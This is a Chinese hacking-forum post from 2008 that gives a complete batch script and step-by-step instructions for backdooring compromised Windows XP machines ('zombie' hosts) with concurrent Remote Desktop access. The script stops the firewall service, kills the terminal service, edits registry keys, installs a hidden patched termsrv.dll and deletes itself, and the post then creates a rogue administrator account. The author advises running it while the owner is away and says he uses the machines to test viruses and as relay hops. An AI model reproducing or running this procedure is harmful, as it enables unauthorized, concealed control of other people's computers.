|
|
楼主 |
发表于 2008-3-11 00:22:08
|
显示全部楼层
|阅读模式
来自 河南省郑州市
我提供个能双开3389的
先找个开3389的小工具把他的3389先给开了,(这个好找),然后替换他的终端组件termsrv.dll
替换为英文XP2055版的
建个批处理文件:
@echo off
@net stop sharedaccess
@ntsd -c q -p \"pid\"
@reg add HKLM\\SOFTWARE\\Microsoft\\Windows\" \"NT\\CurrentVersion\\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 000****0000 /f
@reg add HKLM\\SYSTEM\\CurrentControlSet\\control\\terminal\" \"server\\Licensing\" \"Core /v EnableConcurrentSessions /t REG_DWORD /d 000****0001 /f
@reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%\\system32\\termsrvhack.dll /f
@copy c:\\termsrvhack.dll c:\\windows\\system32\\dllcache\\termsrvhack.dll
@attrib +h +s +r c:\\windows\\system32\\dllcache\\termsrvhack.dll
@copy c:\\termsrvhack.dll c:\\windows\\system32\\termsrvhack.dll
@attrib +h +s +r c:\\windows\\system32\\termsrvhack.dll
@shutdown -a
@del c:\\termsrvhack.dll
@net start termservice
@del c:\\3389.bat
其中第3行“pid\"是要替换成TermService服务的PID号
在他的DOS下用tasklist空格/svc查看 (前提是3389以被启动)
然后把2055版的termsrv.dll(我以改名为termsrvhack.dll) 放在C盘根目录下,然后运行批处理文件。[必须改名为termsrvhack.dll]
最好在他没人看的时候运行,因为其中回出现一个60秒倒记时关机,不过在到50秒的时候就消失了。
之后在他的DOS下建个Administrator组的号:
net user full 3389 /add [建立用户full密码为3389]
只要显示命令成功,那么我们可以把他加入Administrator组了(在Administrator组中才有管理员权限):
net localgroup Administrators full /add [修改用户full为Administrator组]
之后就可以用你建立的号在XP下双登陆了。
以下为附件下载后的步骤:
1.上传3389.exe到肉鸡(XP系统)
2.让肉鸡运行3389.exe并查看是否打开
3.在肉鸡的DOS下用命令tasklist /svc查看TermService服务的PID号
4.修改批处理文件第3行的PID为你所查到的PID号
5.上传termsrvhack.dll到肉鸡C盘跟目录
6.在DOS下建立用户并设置为Administrator组
7.运行批处理文件
哎,累死了,终于搞完了,希望大家能用到,这个不错的,我经常在肉鸡上实验病毒的威力或者当跳板。挺实用的!
教程在
http://www.nb5.cn/read.php?tid=5737 |
-
-
3389.rar
4 KB, 下载次数: 111
XP开3389的工具,如果你不放心可以自己去找
-
-
termsrvhack.rar
97 KB, 下载次数: 96
XP英文2055版的termsrv.dll
-
-
1.rar
1 KB, 下载次数: 75
批处理命令在运行批处理命令之前必须要修改里面的第3行的PID值
|
发表于 2008-3-11 00:27:36
